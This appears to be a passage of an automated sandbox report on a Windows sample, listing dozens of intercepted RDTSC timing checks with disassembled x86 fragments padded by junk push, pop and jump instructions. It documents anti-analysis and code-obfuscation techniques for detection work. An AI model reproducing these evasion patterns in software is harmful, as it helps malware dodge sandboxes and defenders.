Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0C2A9 second address: D0C2AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0C2AF second address: D0C2B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0C2B6 second address: D0C2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C9CCB9 second address: C9CCC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1795E second address: D17962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17962 second address: D17986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FCBA141FCBCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17986 second address: D1799D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1799D second address: D179A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D179A3 second address: D179A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17C5B second address: D17C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17C61 second address: D17C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17C65 second address: D17C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17DC6 second address: D17E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FCBA141C936h 0x0000000b jmp 00007FCBA141C934h 0x00000010 popad 0x00000011 jo 00007FCBA141C961h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D180D3 second address: D180D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D180D9 second address: D180DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D186BA second address: D186CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCBA141FCA6h 0x0000000a jl 00007FCBA141FCAEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D186CC second address: D186D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1762C second address: D1764D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCAEh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d jg 00007FCBA141FCF0h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1764D second address: D17653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17653 second address: D1765C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1765C second address: D17674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C934h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1D72B second address: D1D730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1D730 second address: D1D744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Ah 0x00000007 jo 00007FCBA141C932h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1D744 second address: D1D767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141FCA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FCBA141FCABh 0x00000012 js 00007FCBA141FCA8h 0x00000018 push edx 0x00000019 pop edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8837 second address: CD883D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8DBA second address: CD8DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8DC1 second address: CD8DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EA0 second address: CD8EA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EA5 second address: CD8EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jbe 00007FCBA141C926h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EB7 second address: CD8EF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e jnc 00007FCBA141FCA8h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FCBA141FCB8h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EF7 second address: CD8EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EFF second address: CD8F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop eax 0x00000007 sub dword ptr [ebp+122D2456h], esi 0x0000000d push 426B936Eh 0x00000012 ja 00007FCBA141FCB8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007FCBA141FCA6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8F1F second address: CD8F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD90DC second address: CD90E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD90E0 second address: CD90E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD92D4 second address: CD92DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9716 second address: CD971B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD971B second address: CD9729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9729 second address: CD9777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2920h] 0x00000011 mov edi, dword ptr [ebp+122D2AD8h] 0x00000017 push 0000001Eh 0x00000019 mov dword ptr [ebp+122D323Eh], edx 0x0000001f nop 0x00000020 push edi 0x00000021 push ecx 0x00000022 jmp 00007FCBA141C930h 0x00000027 pop ecx 0x00000028 pop edi 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c je 00007FCBA141C926h 0x00000032 jmp 00007FCBA141C92Ch 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9777 second address: CD977B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD990C second address: CD9910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9B62 second address: CD9BD0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBA141FCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FCBA141FCB2h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FCBA141FCA8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d movsx edx, ax 0x00000030 lea eax, dword ptr [ebp+1247A629h] 0x00000036 mov di, si 0x00000039 nop 0x0000003a jc 00007FCBA141FCAAh 0x00000040 push edi 0x00000041 push esi 0x00000042 pop esi 0x00000043 pop edi 0x00000044 push eax 0x00000045 jbe 00007FCBA141FCC6h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FCBA141FCADh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9BD0 second address: CC0265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+1244AED8h], ecx 0x00000010 call dword ptr [ebp+122D2F13h] 0x00000016 jmp 00007FCBA141C92Dh 0x0000001b pushad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1C987 second address: D1C9B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FCBA141FCA6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FCBA141FCAEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1CAEA second address: D1CAF4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA141C926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1CC2D second address: D1CC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1CC31 second address: D1CC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCBA141C926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1CC41 second address: D1CC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1CDAC second address: D1CDB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1CDB2 second address: D1CDD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FCBA141FCADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FCBA141FCA8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 jp 00007FCBA141FCAEh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1D331 second address: D1D339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D1D339 second address: D1D348 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA141FCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20AEA second address: D20AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20AEF second address: D20AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20AF6 second address: D20AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20AFF second address: D20B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20B03 second address: D20B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20B09 second address: D20B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a jmp 00007FCBA141FCB3h 0x0000000f pop ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FCBA141FCADh 0x00000018 popad 0x00000019 jo 00007FCBA141FCB3h 0x0000001f jmp 00007FCBA141FCADh 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20C8D second address: D20C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20C93 second address: D20C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20C99 second address: D20CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FCBA141C939h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D20CC0 second address: D20CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FCBA141FCA8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D233A3 second address: D233C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FCBA141C937h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D2741C second address: D2743A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCB4h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D2743A second address: D2744D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141C926h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D2744D second address: D27453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D27453 second address: D27469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FCBA141C92Fh 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D27469 second address: D27477 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FCBA141FCA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: CD9559 second address: CD95D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCBA141C928h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FCBA141C932h 0x00000013 jp 00007FCBA141C92Ch 0x00000019 jno 00007FCBA141C926h 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FCBA141C928h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov edi, eax 0x0000003c stc 0x0000003d mov ebx, dword ptr [ebp+1247A668h] 0x00000043 movsx edx, cx 0x00000046 add eax, ebx 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b call 00007FCBA141C928h 0x00000050 pop edx 0x00000051 mov dword ptr [esp+04h], edx 0x00000055 add dword ptr [esp+04h], 0000001Bh 0x0000005d inc edx 0x0000005e push edx 0x0000005f ret 0x00000060 pop edx 0x00000061 ret 0x00000062 and dl, FFFFFF87h 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 pushad 0x0000006a popad 0x0000006b jns 00007FCBA141C926h 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D2C03E second address: D2C046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D30A80 second address: D30A85 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D2FDFE second address: D2FE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141FCACh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D30215 second address: D3021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D30395 second address: D3039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D30530 second address: D30536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D30536 second address: D3053C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D36D67 second address: D36D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D36D6B second address: D36D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D36D6F second address: D36D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FCBA141C926h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D36D7F second address: D36D98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D36D98 second address: D36D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D36D9C second address: D36DBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCBA141FCB3h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D37053 second address: D37073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D40D18 second address: D40D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FCBA141FCA8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D40D39 second address: D40D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCBA141C92Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D44AE8 second address: D44AFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FCBA141FCAAh 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
